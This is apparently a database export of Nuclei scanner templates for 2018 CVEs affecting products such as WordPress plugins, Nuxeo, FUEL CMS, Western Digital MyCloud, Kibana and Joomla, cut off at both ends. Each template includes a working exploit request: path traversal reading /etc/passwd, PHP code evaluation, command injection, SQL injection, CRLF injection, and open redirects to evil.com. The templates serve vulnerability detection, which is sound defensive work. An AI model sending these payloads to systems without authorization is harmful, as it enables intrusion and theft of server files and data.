"3e9e4bcff701b90dd76de34258525801", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805b" }, "name": "CVE-2018-16299.yaml", "content": "id: CVE-2018-16299\n\ninfo:\n name: WordPress Localize My Post 1.0 - Local File Inclusion\n author: 0x_Akoko,0x240x23elu\n severity: high\n description: |\n WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Update to the latest version of WordPress Localize My Post plugin.\n reference:\n - https://www.exploit-db.com/exploits/45439\n - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html\n - https://github.com/julianburr/wp-plugin-localizemypost/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16299\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-16299\n cwe-id: CWE-22\n epss-score: 0.02738\n epss-percentile: 0.89516\n cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: localize_my_post_project\n product: localize_my_post\n framework: wordpress\n tags: cve2018,cve,wordpress,lfi,plugin,wp,edb,packetstorm,localize_my_post_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022056d51d6fc9cfa3c7640e2cf5f87480ff24276f614122fe0d7b013a4a15c55153022100fb25142662e4c537cc01d2effca6acbfed88d9958dfe32e560e6bc7954914d4c:922c64590222798bb761d5b6d8e72950", "hash": "2c751c66090165692c2807d7b441f6af", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805c" }, "name": "CVE-2018-16341.yaml", "content": "id: CVE-2018-16341\n\ninfo:\n name: Nuxeo <10.3 - Remote Code Execution\n author: madrobot\n severity: high\n description: |\n Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16299\n classification:\n cve-id: CVE-2018-16341\n metadata:\n max-request: 1\n tags: cve,cve2018,nuxeo,ssti,rce,bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"31333333337\"\n# digest: 490a00463044022017a2a773e0a8c43949c4027d6437f57793abc123d2c7261c898df8c37a3837af02206bcaf8386cd8920db888038d5d0ee827d956b2cc5222be63bb1649ac54c8d3a5:922c64590222798bb761d5b6d8e72950", "hash": "71e4ffc41a2cdb742d83af4ee8f066fa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805d" }, "name": "CVE-2018-16668.yaml", "content": "id: CVE-2018-16668\n\ninfo:\n name: CirCarLife <4.3 - Improper Authentication\n author: geeknik\n severity: medium\n description: CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system.\n remediation: |\n Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.\n reference:\n - https://www.exploit-db.com/exploits/45384\n - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life\n - https://www.exploit-db.com/exploits/45384/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16668\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16668\n cwe-id: CWE-287\n epss-score: 0.00189\n epss-percentile: 0.55432\n cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: circontrol\n product: circarlife_scada\n tags: cve,cve2018,circarlife,scada,iot,disclosure,edb,circontrol\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html/repository\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"CirCarLife Scada\"\n\n - type: word\n part: body\n words:\n - \"** Platform sources **\"\n - \"** Application sources **\"\n condition: and\n# digest: 4b0a004830460221008a613403e95cd869d597b3567f9774508802b578940d4923d3e724796ed4a51d022100e7705c676701af5b47545de5a166c31d2a905825dee9546405c3aa21ab76d712:922c64590222798bb761d5b6d8e72950", "hash": "b6d32ad30f20cab7b2cfc20c07339782", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805e" }, "name": "CVE-2018-16670.yaml", "content": "id: CVE-2018-16670\n\ninfo:\n name: CirCarLife <4.3 - Improper Authentication\n author: geeknik\n severity: medium\n description: CirCarLife before 4.3 is susceptible to improper authentication. A PLC status disclosure exists due to lack of authentication for /html/devstat.html. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: |\n Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.\n reference:\n - https://www.exploit-db.com/exploits/45384\n - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life\n - https://www.exploit-db.com/exploits/45384/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16670\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16670\n cwe-id: CWE-287\n epss-score: 0.00169\n epss-percentile: 0.53916\n cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: circontrol\n product: circarlife_scada\n tags: cve,cve2018,scada,plc,iot,disclosure,edb,circarlife,circontrol\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/services/user/values.xml?var=STATUS\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"CirCarLife Scada\"\n\n - type: word\n part: body\n words:\n - \"\"\n - \"Reader.STATUS\"\n condition: and\n# digest: 4b0a00483046022100e9a92579c1c238310ebd4e5b286c2be5996bb424926707aebfc53c1affabef01022100bdbe95d2ea918c7a717174f6195a801e2354131f423ac56e578321d1e3cc3cdc:922c64590222798bb761d5b6d8e72950", "hash": "40158363fc665e07de68e24e5fec1cb3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805f" }, "name": "CVE-2018-16671.yaml", "content": "id: CVE-2018-16671\n\ninfo:\n name: CirCarLife <4.3 - Improper Authentication\n author: geeknik\n severity: medium\n description: CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system.\n remediation: |\n Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.\n reference:\n - https://www.exploit-db.com/exploits/45384\n - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16671\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16671\n cwe-id: CWE-200\n epss-score: 0.00189\n epss-percentile: 0.55432\n cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: \"circontrol\"\n product: circarlife_scada\n tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html/device-id\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"CirCarLife Scada\"\n\n - type: word\n part: body\n words:\n - \"circontrol\"\n\n - type: regex\n part: body\n regex:\n - \"(19|20)\\\\d\\\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])\"\n# digest: 4a0a00473045022100bb761bd732caa4633175fb277ae6cb5413db1b1f38be0f5a60575eb0ac8fcc52022069ee62eab829a913c99b59cb9268d67426dd4012e8ebcaf33d69fe06bb0422de:922c64590222798bb761d5b6d8e72950", "hash": "e810883c6782b09aee95c5186df88845", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308060" }, "name": "CVE-2018-16716.yaml", "content": "id: CVE-2018-16716\n\ninfo:\n name: NCBI ToolBox - Directory Traversal\n author: 0x_Akoko\n severity: critical\n description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.\n impact: |\n An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox.\n reference:\n - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16716\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/grymer/CVE\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2018-16716\n cwe-id: CWE-22\n epss-score: 0.00543\n epss-percentile: 0.74952\n cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nih\n product: ncbi_toolbox\n tags: cve,cve2018,ncbi,lfi,nih\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022018fd3deeccb83eb769fde94c8460fb450d314b6cd1d5f09e5e6673e66c1f30d5022100e35701ec81596fff8cae290f6d481ccbebcaeb0da6573b1f149d30d8f945a163:922c64590222798bb761d5b6d8e72950", "hash": "5310454d1653df953fe6075cf60a925d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308061" }, "name": "CVE-2018-16761.yaml", "content": "id: CVE-2018-16761\n\ninfo:\n name: Eventum <3.4.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.\n remediation: |\n Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability.\n reference:\n - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/\n - https://github.com/eventum/eventum/releases/tag/v3.4.0\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16761\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-16761\n cwe-id: CWE-601\n epss-score: 0.00068\n epss-percentile: 0.28116\n cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eventum_project\n product: eventum\n tags: cve,cve2018,redirect,eventum,oss,eventum_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/select_project.php?url=http://interact.sh'\n - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950", "hash": "134a99bee04b61bfe184a4bc3cf8bcd7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308062" }, "name": "CVE-2018-16763.yaml", "content": "id: CVE-2018-16763\n\ninfo:\n name: FUEL CMS 1.4.1 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server.\n remediation: |\n Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/47138\n - https://www.getfuelcms.com/\n - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16763\n - https://github.com/daylightstudio/FUEL-CMS/issues/478\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16763\n cwe-id: CWE-74\n epss-score: 0.83285\n epss-percentile: 0.98356\n cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thedaylightstudio\n product: fuel_cms\n tags: cve,cve2018,fuelcms,rce,edb,thedaylightstudio\n\nhttp:\n - raw:\n - |\n GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100aa22ae2b5004894a2274f6ac1b4e153cdcd9a2081a3e84d0853a7612a808693f02202177babac08cedd1a18e2d633c4f2705131f42a6354c14302ec02ebddbfdaf1e:922c64590222798bb761d5b6d8e72950", "hash": "82c05868fd5643f5a283efd3aa2f2db6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308063" }, "name": "CVE-2018-16836.yaml", "content": "id: CVE-2018-16836\n\ninfo:\n name: Rubedo CMS <=3.4.0 - Directory Traversal\n author: 0x_Akoko\n severity: critical\n description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Upgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch.\n reference:\n - https://www.exploit-db.com/exploits/45385\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16836\n - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms\n - https://www.exploit-db.com/exploits/45385/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16836\n cwe-id: CWE-22\n epss-score: 0.26631\n epss-percentile: 0.96643\n cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rubedo_project\n product: rubedo\n tags: cve2018,cve,rubedo,lfi,edb,rubedo_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d269609e9e99d0bdcd79d0fcc8f5b9fbcf7c09469f92d28e20e23c0c03b931b7022054d56d332e1163cb08f2567a622b794aaa85cb5d57b3e78cce3aa57152c9b586:922c64590222798bb761d5b6d8e72950", "hash": "164a096e749915c06719b6b181c8bcec", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308064" }, "name": "CVE-2018-16979.yaml", "content": "id: CVE-2018-16979\n\ninfo:\n name: Monstra CMS 3.0.4 - HTTP Header Injection\n author: 0x_Akoko\n severity: medium\n description: |\n Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.\n impact: |\n This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE).\n remediation: |\n Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability.\n reference:\n - https://github.com/howchen/howchen/issues/4\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16979\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-16979\n cwe-id: CWE-113\n epss-score: 0.00141\n epss-percentile: 0.48943\n cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: monstra\n product: monstra\n tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'new line detected in'\n - 'cryptographp.php'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950", "hash": "7a060181eb7a11242fb4a1c2b1cb69f6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308065" }, "name": "CVE-2018-17153.yaml", "content": "id: CVE-2018-17153\n\ninfo:\n name: Western Digital MyCloud NAS - Authentication Bypass\n author: DhiyaneshDk\n severity: critical\n description: |\n It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \\\"cgi_get_ipv6\\\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \\\"flag\\\" with the value \\\"1\\\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to data theft or unauthorized control of the NAS.\n remediation: |\n Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability.\n reference:\n - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/\n - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n - https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-10108\n - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-17153\n cwe-id: CWE-287\n epss-score: 0.81607\n epss-percentile: 0.98273\n cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: western_digital\n product: my_cloud_wdbctl0020hwt_firmware\n shodan-query: http.favicon.hash:-1074357885\n tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital\n\nhttp:\n - raw:\n - |\n POST /web/google_analytics.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Cookie: isAdmin=1; username=admin;\n\n cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n\n matchers:\n - type: dsl\n dsl:\n - regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)\n - contains(body, \"ganalytics\")\n - status_code == 200\n condition: and\n# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950", "hash": "d1a11531c1b62ec49a7ebd046caf3622", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308066" }, "name": "CVE-2018-17246.yaml", "content": "id: CVE-2018-17246\n\ninfo:\n name: Kibana - Local File Inclusion\n author: princechaddha,thelicato\n severity: critical\n description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks.\n remediation: |\n Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md\n - https://www.elastic.co/community/security\n - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594\n - https://nvd.nist.gov/vuln/detail/CVE-2018-17246\n - https://access.redhat.com/errata/RHBA-2018:3743\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-17246\n cwe-id: CWE-829,CWE-73\n epss-score: 0.96638\n epss-percentile: 0.99612\n cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: elastic\n product: \"kibana\"\n tags: cve,cve2018,lfi,kibana,vulhub,elastic\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\\\"message\\\":\\\"An internal server error occurred\\\"\"\n\n - type: word\n part: header\n words:\n - \"kbn-name\"\n - \"kibana\"\n case-insensitive: true\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n# digest: 4b0a00483046022100d98c22603e30ee350d3b573d9d5ff4825287da33be904cc6363124775e5f14d2022100d0bdd8ca21310b6a688ca6b83bff7e0985fca4c661abd0703e2b8242d3bf6853:922c64590222798bb761d5b6d8e72950", "hash": "9e9e08a95454db09bc96354de42eeeaa", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308067" }, "name": "CVE-2018-17254.yaml", "content": "id: CVE-2018-17254\n\ninfo:\n name: Joomla! JCK Editor SQL Injection\n author: Suman_Kar\n severity: critical\n description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: Update or remove the affected plugin.\n reference:\n - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html\n - https://www.exploit-db.com/exploits/45423/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-17254\n cwe-id: CWE-89\n epss-score: 0.81793\n epss-percentile: 0.98093\n cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\\!:*:*\n metadata:\n max-request: 1\n vendor: arkextensions\n product: jck_editor\n framework: joomla\\!\n tags: cve,cve2018,packetstorm,edb,joomla,sqli,arkextensions,joomla\\!\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n# digest: 4a0a00473045022100b261fe2697190cd7fac57caae056784c0fcdafa77339c5b1b838502a79539d01022021a432a3def85765211df2c94058fa14b19323731d5e4f2f7735033eef2d39b6:922c64590222798bb761d5b6d8e72950", "hash": "41fe0f8a3946961ce88e16d5dec9ef32", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308068" }, "name": "CVE-2018-17422.yaml", "content": "id: CVE-2018-17422\n\ninfo:\n name: DotCMS < 5.0.2 - Open Redirect\n author: 0x_Akoko,daffainfo\n severity: medium\n description: |\n dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability.\n reference:\n - https://github.com/dotCMS/core/issues/15286\n - https://nvd.nist.gov/vuln/detail/CVE-2018-17422\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-17422\n cwe-id: CWE-601\n epss-score: 0.00118\n epss-percentile: 0.44971\n cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: dotcms\n product: dotcms\n shodan-query: http.title:\"dotCMS\"\n tags: cve2018,cve,redirect,dotcms\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'\n - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"self.location = 'http://evil.com'\"\n - \"location.href = 'http\\\\x3a\\\\x2f\\\\x2fwww\\\\x2eevil\\\\x2ecom'\"\n# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950", "hash": "b4e423c53a03840b8fa257073c9f2c44", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308069" }, "name": "CVE-2018-17431.yaml", "content": "id: CVE-2018-17431\n\ninfo:\n name: Comodo Unified Threat Management Web Console - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Apply the latest security patches or updates provided by Comodo to fix this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/48825\n - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276\n - https://nvd.nist.gov/vuln/detail/CVE-2018-17431\n - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437\n - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view\n classification:\n cvss-metrics: 